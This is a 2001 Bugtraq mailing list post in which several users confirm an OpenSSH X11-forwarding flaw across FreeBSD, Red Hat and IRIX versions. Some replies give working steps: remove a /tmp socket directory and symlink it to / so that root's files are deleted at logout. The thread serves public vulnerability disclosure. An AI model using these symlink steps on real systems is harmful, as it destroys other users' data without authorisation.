Bugtraq mailing list archives
Re: SSH allows deletion of other users files...
From: aleph1 () securityfocus com
Date: Tue, 5 Jun 2001 11:30:37 -0600
Tomas Ericsson <te () matematik su se> The vulnerability works perfectly for me: sshd version OpenSSH_2.3.0 green () FreeBSD org 20010321 # uname -a FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001 root () jkh101 osd bsdi com:/usr/src/sys/compile/GENERIC alpha [root@myhost root]# echo "testing">/cookies [root@myhost root]# ls -l /cookies -rw-r--r-- 1 root wheel 8 Jun 5 01:48 /cookies [root@myhost root]# ssh -l te myhost [te@myhost te]# rm -rf /tmp/ssh-1i24iea5 [te@myhost te]# ln -s / /tmp/ssh-1i24iea5 [te@myhost te]# logout [root@myhost root]# ls -l /cookies ls: /cookies: No such file or directory Shannon Lee <shannon () scatter com> reproduced with OpenSSH_2.3.0p1 on redhat 6.2. TE <te () linux nu> This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest updated packages from RedHat installed. RH71# uname -a Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown RH71# rpm -qa|grep openssh-server openssh-server-2.5.2p2-5 RH70# uname -a Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown RH70# rpm -qa|grep openssh-server openssh-server-2.5.2p2-1.7.2 "David Thiel" <dthiel () nexprise com> I tested this on 4.3-RELEASE, and was successful. SSH Version OpenSSH_2.3.0 green () FreeBSD org 20010321 KF <dotslash () snosoft com> Works on my box [root@bounce dotslash]# cat /etc/redhat-release Red Hat Linux release 7.0 (Guinness) root@bounce dotslash]# ssh -V SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0. Compiled with SSL (0x0090581f). Jan-Frode Myklebust <janfrode () parallab uib no> I just tested with OpenSSH_2.5.2p2 on RedHat 7.0, and OpenSSH_2.9p1 on IRIX 6.5 and both are vulnerable to this. I used protocol version 2 on both machines. Luciano Miguel Ferreira Rocha <strange () nsk yi org> Confirmied on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have X forwarding activated. "Golden_Eternity" <bhodi () bigfoot com> I tried to reproduce this on a system running ssh 2.4.0, but I was unable to locate the /tmp/ssh-* directory. What version of ssh were you using when you discovered this? [test@shiva test]$ ssh test@localhost warning: Need basic cursor movement capablity, using vt100 test's password: Authentication successful. Last login: Mon Jun 04 2001 10:42:08 -0700 No mail. [test@shiva test]$ ls -l /tmp/ total 12 drwxr-xr-x 2 root root 12288 Apr 8 11:59 lost+found [test@shiva test]$ "Schlosser, Matt D." <mschlosser () eschelon com On the contrary, it just takes another form: [root@bob /root]# touch /cookies;ls /cookies /cookies [root@bob /root]# ssh zen@localhost zen@localhost's password: [zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen [zen@bob zen]$ logout Connection to localhost closed. [root@bob /root]# ls /cookies /bin/ls: /cookies: No such file or directory -- Elias Levy SecurityFocus.com http://www.securityfocus.com/ Si vis pacem, para bellum
Current thread:
- SSH allows deletion of other users files... zen-parse (Jun 04)
- Re: SSH allows deletion of other users files... Jason DiCioccio (Jun 04)
- Re: SSH allows deletion of other users files... Dan Astoorian (Jun 05)
- Re: SSH allows deletion of other users files... Jerry Connolly (Jun 05)
- Re: SSH allows deletion of other users files... Markus Friedl (Jun 05)
- Re: SSH allows deletion of other users files... aleph1 (Jun 05)
- Re: SSH allows deletion of other users files... David F. Skoll (Jun 04)
- Re: SSH allows deletion of other users files... sarnold (Jun 05)
- Re: SSH allows deletion of other users files... Markus Friedl (Jun 04)
- Re: SSH / X11 auth: needless complexity -> security problems? Peter W (Jun 05)
- Re: SSH / X11 auth: needless complexity -> security problems? Markus Friedl (Jun 08)
- Re: SSH / X11 auth: needless complexity -> security problems? Theo de Raadt (Jun 10)
- Message not available
- Message not available
- Re: SSH / X11 auth: needless complexity -> security problems? Dale Southard (Jun 08)
- Re: SSH / X11 auth: needless complexity -> security problems? Casper Dik (Jun 10)
- Re: SSH allows deletion of other users files... sarnold (Jun 05)
- Re: SSH allows deletion of other users files... Jason DiCioccio (Jun 04)